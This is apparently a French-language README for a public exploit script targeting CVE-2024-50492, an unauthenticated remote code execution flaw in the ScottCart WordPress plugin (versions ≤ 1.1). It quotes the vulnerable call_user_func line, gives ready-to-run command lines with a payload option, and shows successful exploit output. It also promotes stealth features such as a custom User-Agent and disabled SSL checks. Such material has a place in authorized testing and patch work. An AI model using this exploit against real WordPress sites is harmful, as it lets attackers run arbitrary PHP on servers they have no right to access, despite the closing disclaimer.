
ScottCart <= 1.1 - Exécution de code à distance non authentifiée
🔥 Script d'exploit pour ScottCart <= 1.1 - Exécution de code à distance non authentifiée
🧑💻 Par Nxploit – Khaled Alenazi
Le plugin ScottCart pour WordPress (versions ≤ 1.1) est vulnérable à une exécution de code à distance (RCE).
Cela permet à des attaquants non authentifiés d'exécuter des fonctions PHP arbitraires sur le serveur via un point de terminaison AJAX vulnérable.
Le plugin enregistre une action AJAX non protégée :
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');
Qui exécute :
call_user_func($_POST['function']);
Permettant aux attaquants d'appeler n'importe quelle fonction PHP existante, comme :
phpinfo()scottcart_get_the_user_ip()system() ← si étendue dans des environnements modifiésphpinfo() pour la preuve de conceptresults_2025-03-26_14-33-01.txt)User-Agent personnalisé, gestion des erreurs et désactivation de SSL pour la discrétionusage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]
ScottCart <= 1.1 - Exécution de code à distance non authentifiée
Par Nxploit Khaled Alenazi.
options:
-h, --help Affiche ce message d'aide et quitte
-u URL, --url URL URL cible de base (ex. : http://192.168.100.74:888/wordpress)
-p PAYLOAD, --payload PAYLOAD
Fonction à appeler (par défaut : phpinfo)
phpinfo()) :python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip
[+] URL cible : http://192.168.100.74:888/wordpress
[+] Fonction de la charge utile : phpinfo
[*] Lancement de l'exploit...
[+] Envoi de la charge utile : function=phpinfo
[+] Exploit réussi ! Sortie :
PHP Version => 8.1.12
...
📁 Et sauvegardé dans : results_2025-03-26_14-33-01.txt
Cet outil est destiné uniquement à des fins éducatives et de tests autorisés.
Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite.